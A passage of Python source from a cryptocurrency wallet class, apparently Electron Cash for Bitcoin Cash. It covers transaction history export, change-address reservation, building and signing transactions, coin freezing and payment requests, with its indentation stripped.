self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
elif callable(fixed_fee):
fee_estimator = fixed_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
# Note: we could do an is_mine check here for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = max(local_height - tx_height + 1, 0)
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
if not paid:
status = PR_UNPAID
elif conf == 0:
status = PR_UNCONFIRMED
else:
status = PR_PAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
